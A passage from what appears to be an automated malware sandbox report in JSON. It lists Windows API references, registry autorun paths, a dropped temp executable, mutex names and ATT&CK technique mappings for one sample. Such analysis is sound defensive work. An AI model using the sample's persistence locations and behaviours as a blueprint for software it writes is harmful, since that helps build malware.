Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsAlloc\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsFree\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsGetValue\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsSetValue\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualQuery\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"lstrlenW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"AllocateAndInitializeSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateWellKnownSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EqualSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FreeSid\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTokenInformation\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"OpenProcessToken\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegFlushKey\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateFileW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateProcessW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateSemaphoreA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteFileW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EnumResourceNamesA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExpandEnvironmentStringsW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindNextFileW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTempPathW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetVolumeInformationW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsDBCSLeadByteEx\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MoveFileExW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MoveFileW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReleaseSemaphore\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetCurrentDirectoryW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetEvent\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetLastError\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsAlloc\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsFree\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsGetValue\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsSetValue\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualQuery\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"lstrlenW\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExW\" (Indicator: \"RegCreateKey\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"RegCreateKeyExW\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"RegCreateKeyExW\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"RegCreateKeyExW\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n \"uSoftware\\Microsoft\\Windows\\CurrentVersion\\Policies\\system\" in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Uninstall\" in Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system\" in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Uninstall\" in Source: 00000000-00005304.00000000.173115.00481000.00000002.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-322", "type": 2, "relevance": 1, "name": "Contains ability to move file or directory (API string)", "description": "Found reference to API \"MoveFileExW\" (Indicator: \"MoveFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"MoveFileW\" (Indicator: \"MoveFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"MoveFileExW\" (Indicator: \"MoveFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"MoveFileW\" (Indicator: \"MoveFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"MoveFileExW\" (Indicator: \"MoveFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"MoveFileW\" (Indicator: \"MoveFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"MoveFileExW\" (Indicator: \"MoveFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"MoveFileW\" (Indicator: \"MoveFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005304)\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005304)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006104)\n 